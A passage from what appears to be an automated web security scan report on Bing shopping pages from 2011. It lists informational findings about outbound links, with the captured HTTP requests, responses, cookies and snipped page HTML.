<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,236.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchnews&P1=dsatnews&P2=ozzy+osbourne+justin+bieber&P3=0&P4=msnhpm&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Dallas%2c+Texas&P7=Original&P8=&P9=32.8%2f-96.787&P10=24902&P11=&P12=&searchtype=News+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2fnews%2fsearch%3fq%3dozzy%2bosbourne%2bjustin%2bbieber%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=FD,238.1')">Tell us what you think</a>
...[SNIP]...

22.387. http://www.bing.com/shopping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/shopping?FORM=SHOPH2

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://www.redacted/

Request

GET /shopping?FORM=SHOPH2 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16331
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:10:00 GMT
Connection: close
Set-Cookie: _SS=SID=382AB2597B664F859F3B1F4ECDBE2E43; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:10:00 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c64c59991068646f1ac387638576bf31b; expires=Tue, 29-Jan-2013 17:10:00 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621030&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:10:00 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,30.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,32.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,43.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,45.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,47.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,49.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,51.1')">About our ads</a>
...[SNIP]...

22.388. http://www.bing.com/shopping/bird-feeders/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/bird-feeders/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/shopping/bird-feeders/search?q=squirrel-proof%20bird%20feeders&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22pricelow%7c10%2cpricehigh%7c25%2cleafcategoryid%7c5289%22%5d&vw=gr&FORM=SHOPH1&crea=012911feedersa

The response contains the following links to other domains:

http://0.r.redacted/?ld=4vOvFsVfLls5GKKOXmD_kUwZ03gXx3yAMSP6uZnzBg6eR-8WySYYIn8CZ2lhOg_1fXhwgMG02QKYZyhIqdZ1MbdWnXCi86aOMThwftDSaS-9fD53ty-bNl9jD6qAk4RTb8U1ebdkkCJKLna8lqARIWKsaHbhyDPT60jgjbM76EK-vM41K5M430vgi04sqYPHcXUGX-ikmqf505PzVGgur6a1sT2MpStslAbZXPd6nT034yYi7Wsazn5fpptWKeJIxiLTtoJX_YpcJ6TcWPHx0Xeg1WFfH2A02dgppI13poh7Ze4MP3CduRB26W003JBNGI__rRukVNfjgEArp07XsxxGYIbPBQadjSlsE2tjc421gR-V1RCJpOa57TYpkdLuprWnYCYoas61rk54vHSQV5ZBHNMr01NMgPpWx08IP81ncAEOHz8ThJwnvAk19e0RtTNVQJTHiaC9vhM8AkattKUrjeCi0QJmNzPTcI21IJvGCTX1QUi1uApHSLBwhWMP5hLa4MBJ6Z1SNx
http://0.r.redacted/?ld=4vhYz2p829p-yDSlc1rKcrHC3tWKbq9OcLe1noqBr9M8uDF2U859a3PzbtEG4ahyVNRty9v7lct9ewMfhfEn0pdkl7pWuyOrAc5YoGNrT0LIkNY2OkedmQ1j5yxr-x8cNXivnz_8Gnt1Zt1YALHEyZrry2Kz14dj3UzOt70ZLaJKns1aBzJGlEAHthFu5C5W4c_fer4Jpev4YUqU7mecjy1XVvnbQGahrDhb2r_yCJtufU7LFmaj6hUR9YFzkMilYdazUogkyoaE0k1k0wfJlCcvd8W8SJZ3hcZcHDkRZ9C7tSkzmc5EfPgCHrhPoNiI74NVQJTLXg51axKZbsgJzZpyo0LnsQJmNzPe4No5OwpD4gh5NMCib0VcBtf4geJd3upiSgG74-VOZq
http://1037183.r.redacted/?ld=4vj0g2T4LO0vTL9bpK4OMpYLG3ke-LZCgBpDmt50oReKfLzkJB9_zG2C8mfWrXbCnpIHkMbuJNvwdppjo489VSacTxf6QpXwM4KajBdh-tb86BuFCoKtEWzI--2U339O7oU3haa5aHl6aDi8zqvwq6Q3mQcAYWohIWd0P-CNt9RBUz0G5vKSc--ruGvESH7FJQgtYnUAeT-WA4Ojj5TRNNAVD6CRmdD-9ESlQXvaSvsTcxsbCI-_GKfDgUDrjTjgqReVwSRu0XZF1njPJkUHlRDk_kmz23CuiVrVM4gjZwUaMM8B1vZAb1FT7gOVqNj6Ut29DFqzM-x0i5fjOUPpa-CtDRnEpbmXHXAHQv759ZsoY1VAlMBVcgHQ_3jAGSwMJzYQ1kCBAmY3M9wULfRRa_lkSxz1KGHucTEhmF-mU6SiRUBEtxYMlVx-U
http://397330.r.redacted/?ld=4vAgwhprsVNfeAkpqyW4iIdDba8pjDzRPTHbjanHhoRcen_-oIOR5aE6_JM-SA9CuM2eX--K0b9IPYdxhjAuTeWXKAfI8cATtAuqeXD8Ckg0ZETKlNQBbADXOI0KFN0rOAe_IGctTeGVP8a8c5K_uOJtihT2tp7Ak9izCp7aJO-SxGK_SWGLX24u4Gu4FEQKOJSd0CrbY-e3_0FWlpd7RNxP6bdukweVseHOw2FJOlN4secc7giBDBbiluwOdoa_CYNVQJTAvl-8-_qkBLVFArxyCsLxAQJmNzPd_44F5egdKZMM1GS668yq5FNqrGhbMqwfTvrIkTpHJI
http://559049.r.redacted/?ld=4vWaFefffINvAVU4-bn6QSzNI9DIJhwFUsAr38H2TrBCRPTgJh7aSXHkxVFXhuVW5n8dLAXM2nB4yeIvu4wo47B5MCm_xHNdC70SsYP9WqB2eKrCwRmTwKGNpUSJQ43SK39dRcw9aY96ccGikUCGiI_Zbd3TiC_d7KU3Sq6NDNi6-hILgm6l34-7NUkHsPmmAzs82-lJx8T7U4eso0fMRFj12dtteirfryl6BdMGDEZaRH7BQbrGJDt6pUtDfzRzNb5CgwDt0maOBOzucft8jHXzVUCUw6DLQvbIhUnGoJLxzwPK1YECZjcz2JiI8K3HtxG_NtvWWhpJslPOq8C5l_NC5QBHgQ2dGAMg
http://700807.r.redacted/?ld=4v6tppwqIfoUMsl9fzaUJUOG1SzzUPzYaMsfbDt6mwZUvqQOTyZbuiLkgefV90icM0t4CgJl_Zcqx0QnZ4-axkiF1x6VoZn-Mohyoq8dDzF4Eg2kFfj9qdHrWOFi-qMu6nQw8QZ6nT3-qGhp1mECwRB9HSZFRlc_9Hb12WSb8GSDSpz3lxTCiJvaLQI6NrVd1HNBptc2_GJqOUXNhH97GhiAP6XULagROiS5eQSflavRvyKtc-wBepugdCNtJ9R9oQNVQJTAOXYC4FgAeZQXkZxVGoHOEQJmNzPazFATLXNJkpCk8tD3UwkqXtjbJN0QkuNFi8Z7iuiUuL
http://717893.r.redacted/?ld=4vxIte8l13iyKfl6BZ3jX5LboI9iFaFiGAtsnu_qh8i7k-nn3raWZiEc64cEWbSP6OB_U5VU83FqEtaIBaYJN6U9EIgum39oC5KlpXuQns5IAwKF-cJ7Ad7PGTMB2bHoItqu-A_bwwbdwuspPfOFQQ6u_ThKtEv_cIxmtfuFajG3cZVZ_yM-ekVhg4t2BlwTHT9C5Y3TaHTAIf6ks5_Qtzl62mJrhyo9Kc2iYFlmeoU4Q1VAlM_Y8gyCjK84SIP_uRUpL__xAmY3M9xNyeeqwAy2UyvEm-YV8KcibVR7QAp1ufUhuqS5G07xI
http://731936.r.redacted/?ld=4vKOXhALU_i6EayRSIDZjx0zxyHVMT_KpQ4_QSqJ8HcF9j_lWqz_ETzmnrTSU2Ob3ofNi3QxNa2PxSOfidk6UacrDbWWQg8HtdYz-HWECQeNYNVvnSdYGk_JBwD89zXixom9dFZnZRUGnXM0k7Ln_rbNutLjAAp2cscjZzOQL-6lC4yTzfXdvE5yWaHGjeF1S_FRYUx_0vIA1ky-9jbX6AmPOK0rS2Qce46HKkXIIVNQQelVWSge_IANHZOmJJCl10B_g2ov4xLjpWDNuMsHlYePtNTjgDBTBj7SbJveg1hcg1VAlMbTsv_GO2OeAlOF4erVH8vhAmY3M99She7M1nrmTVN-n9TjwXZ2cmwkuP1upGxaw_GwWKkio
http://7531.r.redacted/?ld=4vgLg_KN2uUVhwXNm1rhLw7UxMTCtTbLOtr8mysxtja6YOtMPieD8QIhRgy6VZsWY7l-hmESUZQSQwFfKhvttPoMNRYBq720smmSA6QTtcD0RTlxzhuoyv0J78T7JmIJ3mhdWArtxycXpLZWTRUxhXWmZMkusZzmzRVaNJtn_iNocsRd-NDte5dCaCx6f8-yE_1c6FNEDlFjY52NuvCRr4MLRx3T4RxbLeHfj1BAmoQg5J6HuxxZf8UNXlxZnb8JesNVQJTHJ_25mPHiAUqge1bayQIjcQJmNzPUDsm3U-RQldNe8-anEVT1IBzfl0LRsw5mFyEqUi3KXR
http://a1.bing4.com/getimage?q=big-38D6CB84E7DAC03139A583E4910AA599&wf=Comimage
http://a1.bing4.com/getimage?q=big-5D312B561F004F0CACE149C9B7B4FFB2&wf=Comimage
http://a1.bing4.com/getimage?q=big-6A84F22DC94B850A376CCF9EBC02E7AE&wf=Comimage
http://a1.bing4.com/thumb/get?bid=jhKkKusCxZ0m2A&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a2.bing4.com/getimage?q=big-29E4F1E83B80BF3F7300C6C566069AED&wf=Comimage
http://a2.bing4.com/getimage?q=big-5A3B063AB9DC2DF8E670A0FCEF5DC172&wf=Comimage
http://a2.bing4.com/getimage?q=big-A2FE247771D1987141B6600757EBC51F&wf=Comimage
http://a2.bing4.com/getimage?q=big-D41AB8FB24362B3CD74E9592EF5279D2&wf=Comimage
http://a3.bing4.com/getimage?q=big-4070DAB7F9140FD344D403A3B4ACF0B6&wf=Comimage
http://a3.bing4.com/getimage?q=big-C6B68962FD6A9E067EFFD402274580F7&wf=Comimage
http://a3.bing4.com/getimage?q=big-F6B22D6A49F5360CA085D0C382B2277E&wf=Comimage
http://a3.bing4.com/thumb/get?bid=osjTvyChikYM3w&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a4.bing4.com/getimage?q=big-1523DC39946927A5D5222B2B81809BDF&wf=Comimage
http://a4.bing4.com/getimage?q=big-75DE213847684422F7FA3F52D5828AB2&wf=Comimage
http://a4.bing4.com/getimage?q=big-FC031E1B84612F4ED45AC1904BA9CBC3&wf=Comimage
http://a4.bing4.com/thumb/get?bid=p9MxnzSdSWnuJA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://advertising.microsoft.com/advertise-on-bing
http://advertising.microsoft.com/search/
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US
http://www.redacted/
https://feedback.discoverbing.com/default.aspx?locale=en-US&productkey=bingshopping&P1=dsatcommerce&P2=squirrel-proof%20bird%20feeders&P3=0&P4=SHOPH1&P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&P6=&P7=Original&P8=&P9=0.0/0.0&P10=0.0&P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fbird-feeders%2fsearch%3fq%3dsquirrel-proof%2520bird%2520feeders%26p1%3d%255bCommerceService%2520scenario%253d%2522f%2522%2520r%253d%2522pricelow%257c10%252cpricehigh%257c25%252cleafcategoryid%257c5289%2522%255d%26vw%3dgr%26FORM%3dSHOPH1%26crea%3d012911feedersa&P12=&searchtype=Commerce+Answer&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fbird-feeders%2fsearch%3fq%3dsquirrel-proof%2520bird%2520feeders%26p1%3d%255bCommerceService%2520scenario%253d%2522f%2522%2520r%253d%2522pricelow%257c10%252cpricehigh%257c25%252cleafcategoryid%257c5289%2522%255d%26FORM%3dFEEDTU

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:39 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=C5B30FDE5AF1459BB45DF470E55CE4D3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47521b9f211b4590b705c63c8b0cb105; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Content-Length: 82892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,42.1')">Hotmail</a>
...[SNIP]...
<a href="/shopping/bird-shelter-squirrel-proof-feeder/p/85675473577E12C93FA9?q=squirrel-proof+bird+feeders&FORM=EGCA0" onmousedown="return si_T('&ID=commerce,20.1',this)"><img src="http://a2.bing4.com/getimage?q=big-29E4F1E83B80BF3F7300C6C566069AED&wf=Comimage" title="Bird Shelter Squirrel Proof Feeder" alt="Bird Shelter Squirrel Proof Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
f="/shopping/perky-pet-5110pp-fortress-breakaway-squirrel-proof-bird-feeder/p/DC767814C827953F7AE7?q=squirrel-proof+bird+feeders&FORM=EGCA1" onmousedown="return si_T('&ID=commerce,24.1',this)"><img src="http://a3.bing4.com/getimage?q=big-F6B22D6A49F5360CA085D0C382B2277E&wf=Comimage" title="Perky Pet 5110PP Fortress Breakaway Squirrel Proof Bird Feeder" alt="Perky Pet 5110PP Fortress Breakaway Squirrel Proof Bird Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
href="/shopping/6-lb-capacity-tall-tulip-lantern-bird-feeder-durable-powder/p/A92FB31D54D344EAAB56?q=squirrel-proof+bird+feeders&FORM=EGCA2" onmousedown="return si_T('&ID=commerce,27.1',this)"><img src="http://a4.bing4.com/getimage?q=big-75DE213847684422F7FA3F52D5828AB2&wf=Comimage" title="6 LB Capacity, Tall Tulip Lantern Bird Feeder, Durable Powder ..." alt="6 LB Capacity, Tall Tulip Lantern Bird Feeder, Durable Powder ..." width="99" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/coropration-367-tulip-garden-latern/p/2F18342276957CF1F223?q=squirrel-proof+bird+feeders&FORM=EGCA3" onmousedown="return si_T('&ID=commerce,31.1',this)"><img src="http://a1.bing4.com/getimage?q=big-38D6CB84E7DAC03139A583E4910AA599&wf=Comimage" title="Coropration 367 Tulip Garden Latern" alt="Coropration 367 Tulip Garden Latern" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/perky-pet-336-squirrel-be-gone-feeder/p/23118294C9EFE96A2331?q=squirrel-proof+bird+feeders&FORM=EGCA4" onmousedown="return si_T('&ID=commerce,35.1',this)"><img src="http://a2.bing4.com/getimage?q=big-D41AB8FB24362B3CD74E9592EF5279D2&wf=Comimage" title="Perky Pet #336 Squirrel Be Gone Feeder" alt="Perky Pet #336 Squirrel Be Gone Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/5108-4-topflight-fortress-feeder/p/2DBC77C3824B1291ED4C?q=squirrel-proof+bird+feeders&FORM=EGCA5" onmousedown="return si_T('&ID=commerce,39.1',this)"><img src="http://a3.bing4.com/getimage?q=big-C6B68962FD6A9E067EFFD402274580F7&wf=Comimage" title="5108-4 TopFlight Fortress Feeder" alt="5108-4 TopFlight Fortress Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/brome-1055-squirrel-buster-mini/p/BA7BB415E24D1A22182A?q=squirrel-proof+bird+feeders&FORM=EGCA6" onmousedown="return si_T('&ID=commerce,43.1',this)"><img src="http://a4.bing4.com/getimage?q=big-FC031E1B84612F4ED45AC1904BA9CBC3&wf=Comimage" title="Brome 1055 Squirrel Buster Mini" alt="Brome 1055 Squirrel Buster Mini" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/perky-pet-368-5lb-sunflower-feeder/p/46F1958F27E86DC63B98?q=squirrel-proof+bird+feeders&FORM=EGCA7" onmousedown="return si_T('&ID=commerce,47.1',this)"><img src="http://a1.bing4.com/getimage?q=big-6A84F22DC94B850A376CCF9EBC02E7AE&wf=Comimage" title="Perky Pet #368 5LB Sunflower Feeder" alt="Perky Pet #368 5LB Sunflower Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/gardman-wild-bird-ba01227-seed-master-glazed-feeder/p/3A86C82461CE631E5006?q=squirrel-proof+bird+feeders&FORM=EGCA8" onmousedown="return si_T('&ID=commerce,51.1',this)"><img src="http://a2.bing4.com/getimage?q=big-A2FE247771D1987141B6600757EBC51F&wf=Comimage" title="Gardman Wild Bird BA01227 Seed Master Glazed Feeder" alt="Gardman Wild Bird BA01227 Seed Master Glazed Feeder" width="61" height="127" style="margin-top:19px;" /></a>
...[SNIP]...
<a href="/shopping/squirrel-proof-seed-feeder/p/4E78BEA13E799171A715?q=squirrel-proof+bird+feeders&FORM=EGCA9" onmousedown="return si_T('&ID=commerce,54.1',this)"><img src="http://a3.bing4.com/getimage?q=big-4070DAB7F9140FD344D403A3B4ACF0B6&wf=Comimage" title="Squirrel Proof Seed Feeder" alt="Squirrel Proof Seed Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/woodlink-squirrel-proof-caged-port-tube-feeder/p/07F117FC48A7F6D85006?q=squirrel-proof+bird+feeders&FORM=EGCA10" onmousedown="return si_T('&ID=commerce,57.1',this)"><img src="http://a4.bing4.com/getimage?q=big-1523DC39946927A5D5222B2B81809BDF&wf=Comimage" title="WoodLink Squirrel Proof Caged Port Tube Feeder" alt="WoodLink Squirrel Proof Caged Port Tube Feeder" width="160" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/squirrel-boss-bird-feeder/p/51FFE5276746421E5006?q=squirrel-proof+bird+feeders&FORM=EGCA11" onmousedown="return si_T('&ID=commerce,60.1',this)"><img src="http://a1.bing4.com/getimage?q=big-5D312B561F004F0CACE149C9B7B4FFB2&wf=Comimage" title="Squirrel Boss Bird Feeder" alt="Squirrel Boss Bird Feeder" width="94" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
href="/shopping/arundale-152-mandarin-wild-bird-feeder-with-seed-dividers/p/D9D7174D48284CE9FDD9?q=squirrel-proof+bird+feeders&FORM=EGCA12" onmousedown="return si_T('&ID=commerce,64.1',this)"><img src="http://a2.bing4.com/getimage?q=big-5A3B063AB9DC2DF8E670A0FCEF5DC172&wf=Comimage" title="Arundale 152 Mandarin Wild Bird Feeder with Seed Dividers" alt="Arundale 152 Mandarin Wild Bird Feeder with Seed Dividers" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
sclkid=288EF148235E4DF397E616DBCBE9AB9B&c=795646&mu=http%3a%2f%2fwww.ecrater.com%2fp%2f3235916%2f3-pack-of-window-bird-feeders-squirrel" onmousedown="return si_T('&ID=commerce,68.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=osjTvyChikYM3w&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="3-pack Of Window Bird Feeders Squirrel Proof Window Bird Feeders" alt="3-pack Of Window Bird Feeders Squirrel Proof Window Bird Feeders" width="100" height="70" style="margin-top:47px;" /></a>
...[SNIP]...
msclkid=288EF148235E4DF397E616DBCBE9AB9B&c=795646&mu=http%3a%2f%2fwww.ecrater.com%2fp%2f3278385%2f2-pack-of-squirrel-proof-bird-feeders" onmousedown="return si_T('&ID=commerce,71.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=p9MxnzSdSWnuJA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="2-pack Of Squirrel Proof Bird Feeders Great Gifts For Mom!" alt="2-pack Of Squirrel Proof Bird Feeders Great Gifts For Mom!" width="100" height="87" style="margin-top:39px;" /></a>
...[SNIP]...
B9B&c=795443&mu=http%3a%2f%2fwww.bonanza.com%2fbooths%2fSongbirdHaven%2fitems%2fBird_Feeder_the_Squirrel_Buster_Mini_by_Brome_Bird_Care" onmousedown="return si_T('&ID=commerce,74.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=jhKkKusCxZ0m2A&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="Bird Feeder the Squirrel Buster Mini by Brome Bird Care" alt="Bird Feeder the Squirrel Buster Mini by Brome Bird Care" width="69" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
<h3><a href="http://717893.r.msn.com/?ld=4vxIte8l13iyKfl6BZ3jX5LboI9iFaFiGAtsnu_qh8i7k-nn3raWZiEc64cEWbSP6OB_U5VU83FqEtaIBaYJN6U9EIgum39oC5KlpXuQns5IAwKF-cJ7Ad7PGTMB2bHoItqu-A_bwwbdwuspPfOFQQ6u_ThKtEv_cIxmtfuFajG3cZVZ_yM-ekVhg4t2BlwTHT9C5Y3TaHTAIf6ks5_Qtzl62mJrhyo9Kc2iYFlmeoU4Q1VAlM_Y8gyCjK84SIP_uRUpL__xAmY3M9xNyeeqwAy2UyvEm-YV8KcibVR7QAp1ufUhuqS5G07xI" onmousedown="return si_T('&ID=FD,58.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://1037183.r.redacted/?ld=4vj0g2T4LO0vTL9bpK4OMpYLG3ke-LZCgBpDmt50oReKfLzkJB9_zG2C8mfWrXbCnpIHkMbuJNvwdppjo489VSacTxf6QpXwM4KajBdh-tb86BuFCoKtEWzI--2U339O7oU3haa5aHl6aDi8zqvwq6Q3mQcAYWohIWd0P-CNt9RBUz0G5vKSc--ruGvESH7FJQgtYnUAeT-WA4Ojj5TRNNAVD6CRmdD-9ESlQXvaSvsTcxsbCI-_GKfDgUDrjTjgqReVwSRu0XZF1njPJkUHlRDk_kmz23CuiVrVM4gjZwUaMM8B1vZAb1FT7gOVqNj6Ut29DFqzM-x0i5fjOUPpa-CtDRnEpbmXHXAHQv759ZsoY1VAlMBVcgHQ_3jAGSwMJzYQ1kCBAmY3M9wULfRRa_lkSxz1KGHucTEhmF-mU6SiRUBEtxYMlVx-U" onmousedown="return si_T('&ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://397330.r.msn.com/?ld=4vAgwhprsVNfeAkpqyW4iIdDba8pjDzRPTHbjanHhoRcen_-oIOR5aE6_JM-SA9CuM2eX--K0b9IPYdxhjAuTeWXKAfI8cATtAuqeXD8Ckg0ZETKlNQBbADXOI0KFN0rOAe_IGctTeGVP8a8c5K_uOJtihT2tp7Ak9izCp7aJO-SxGK_SWGLX24u4Gu4FEQKOJSd0CrbY-e3_0FWlpd7RNxP6bdukweVseHOw2FJOlN4secc7giBDBbiluwOdoa_CYNVQJTAvl-8-_qkBLVFArxyCsLxAQJmNzPd_44F5egdKZMM1GS668yq5FNqrGhbMqwfTvrIkTpHJI" onmousedown="return si_T('&ID=FD,62.1,Ads')">Buy Yankee Flipper..</a>
...[SNIP]...
<h3><a href="http://7531.r.msn.com/?ld=4vgLg_KN2uUVhwXNm1rhLw7UxMTCtTbLOtr8mysxtja6YOtMPieD8QIhRgy6VZsWY7l-hmESUZQSQwFfKhvttPoMNRYBq720smmSA6QTtcD0RTlxzhuoyv0J78T7JmIJ3mhdWArtxycXpLZWTRUxhXWmZMkusZzmzRVaNJtn_iNocsRd-NDte5dCaCx6f8-yE_1c6FNEDlFjY52NuvCRr4MLRx3T4RxbLeHfj1BAmoQg5J6HuxxZf8UNXlxZnb8JesNVQJTHJ_25mPHiAUqge1bayQIjcQJmNzPUDsm3U-RQldNe8-anEVT1IBzfl0LRsw5mFyEqUi3KXR" onmousedown="return si_T('&ID=FD,64.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://559049.r.msn.com/?ld=4vWaFefffINvAVU4-bn6QSzNI9DIJhwFUsAr38H2TrBCRPTgJh7aSXHkxVFXhuVW5n8dLAXM2nB4yeIvu4wo47B5MCm_xHNdC70SsYP9WqB2eKrCwRmTwKGNpUSJQ43SK39dRcw9aY96ccGikUCGiI_Zbd3TiC_d7KU3Sq6NDNi6-hILgm6l34-7NUkHsPmmAzs82-lJx8T7U4eso0fMRFj12dtteirfryl6BdMGDEZaRH7BQbrGJDt6pUtDfzRzNb5CgwDt0maOBOzucft8jHXzVUCUw6DLQvbIhUnGoJLxzwPK1YECZjcz2JiI8K3HtxG_NtvWWhpJslPOq8C5l_NC5QBHgQ2dGAMg" onmousedown="return si_T('&ID=FD,66.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vOvFsVfLls5GKKOXmD_kUwZ03gXx3yAMSP6uZnzBg6eR-8WySYYIn8CZ2lhOg_1fXhwgMG02QKYZyhIqdZ1MbdWnXCi86aOMThwftDSaS-9fD53ty-bNl9jD6qAk4RTb8U1ebdkkCJKLna8lqARIWKsaHbhyDPT60jgjbM76EK-vM41K5M430vgi04sqYPHcXUGX-ikmqf505PzVGgur6a1sT2MpStslAbZXPd6nT034yYi7Wsazn5fpptWKeJIxiLTtoJX_YpcJ6TcWPHx0Xeg1WFfH2A02dgppI13poh7Ze4MP3CduRB26W003JBNGI__rRukVNfjgEArp07XsxxGYIbPBQadjSlsE2tjc421gR-V1RCJpOa57TYpkdLuprWnYCYoas61rk54vHSQV5ZBHNMr01NMgPpWx08IP81ncAEOHz8ThJwnvAk19e0RtTNVQJTHiaC9vhM8AkattKUrjeCi0QJmNzPTcI21IJvGCTX1QUi1uApHSLBwhWMP5hLa4MBJ6Z1SNx" onmousedown="return si_T('&ID=FD,68.1,Ads')">At Lowe's..</a>
...[SNIP]...
<h3><a href="http://700807.r.msn.com/?ld=4v6tppwqIfoUMsl9fzaUJUOG1SzzUPzYaMsfbDt6mwZUvqQOTyZbuiLkgefV90icM0t4CgJl_Zcqx0QnZ4-axkiF1x6VoZn-Mohyoq8dDzF4Eg2kFfj9qdHrWOFi-qMu6nQw8QZ6nT3-qGhp1mECwRB9HSZFRlc_9Hb12WSb8GSDSpz3lxTCiJvaLQI6NrVd1HNBptc2_GJqOUXNhH97GhiAP6XULagROiS5eQSflavRvyKtc-wBepugdCNtJ9R9oQNVQJTAOXYC4FgAeZQXkZxVGoHOEQJmNzPazFATLXNJkpCk8tD3UwkqXtjbJN0QkuNFi8Z7iuiUuL" onmousedown="return si_T('&ID=FD,70.1,Ads')"><strong>
...[SNIP]...
